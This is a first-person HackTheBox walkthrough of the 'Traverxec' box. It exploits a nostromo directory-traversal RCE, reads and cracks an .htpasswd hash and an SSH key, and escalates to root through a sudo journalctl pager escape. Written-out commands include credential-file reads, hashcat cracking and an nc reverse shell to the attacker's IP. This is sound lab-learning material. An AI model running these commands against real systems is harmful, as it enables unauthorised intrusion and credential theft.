Traverxec is rated as an easy box on HackTheBox.
As with every HackTheBox machine I started with an nmap scan, which showed port 80 open and running nostromo 1.9.6, a small HTTP server also known as nhttpd.
While searching for information on nostromo, practically the first search result was about a known vulnerability in this version (CVE-2019-16278). I quickly found an exploit for it here. The bug is a directory traversal that leads to remote command execution, hence the box name Traverxec.
The exploit sends a POST request whose path traverses out of the web root to /bin/sh, so the request body is handed to the shell and executed as arbitrary commands.
Using the above exploit script I poked around the box and found an .htpasswd file in the nostromo configuration directory:
./exploit.sh 10.10.10.165 80 cat /var/nostromo/conf/.htpasswd
Copying the hash from that file, which was in md5crypt format (hashcat mode 500), I cracked it with hashcat on my host machine:
hashcat --opencl-platforms=1 --username -m 500 -a 0 -w 3 hash /usr/share/wordlists/rockyou.txt
I now had the first pair of credentials:
Hoping those were SSH credentials I tried logging in with them, but no. They were evidently for something else, so I went back to poking around the box.
At this point it was getting cumbersome to run the exploit script for every single command, so I used it once more to start a Netcat reverse shell back to a listener on my machine:
./exploit.sh 10.10.10.165 80 nc -e /bin/sh 10.10.14.157 9001
For the next part I had to look closely at the nhttpd.conf configuration file, in the same directory where I had found the .htpasswd earlier. It was configured to serve users' home directories, with public_www as the public subdirectory. I could visit http://10.10.10.165/~david, but there was nothing interesting there, and the permissions on /home/david did not allow reading the directory listing. Something was off though: I had execute rights on that folder but not read rights, so I could cd into it (and access any path inside it that I already knew the name of) but not run ls on it. After checking the usual files (.bashrc etc.) in that folder, I tried /home/david/public_www. That worked, ls was allowed there, and I found a backup file. The backup contained a passphrase-protected private SSH key, which I transferred to my host machine and cracked with john.
Finally I had a pair of credentials to SSH into the machine as david and grab user.txt.
In david's home directory I found a folder called bin containing this file: server-status.sh
Running it printed some information about the processes running on the box, and the last line of the script revealed that its final command was run with sudo.
Looking up that command (journalctl) on GTFOBins showed how to escape from its pager and get a shell with !/bin/sh. This did not work from within the script, because there journalctl's output is piped into /usr/bin/cat, and journalctl only starts a pager when its output is a terminal. Running the last part of the script manually from the terminal, without the trailing | /usr/bin/cat, worked: the output opened in less, typing !/bin/sh dropped me into a root shell, since the journalctl command was allowed via password-less sudo. One caveat: if the requested journal lines fit on a single screen, less exits immediately and there is no pager to escape from, so shrink the terminal first (for example with stty rows 5) before running the command.
With this I could read root.txt and the box was pwned.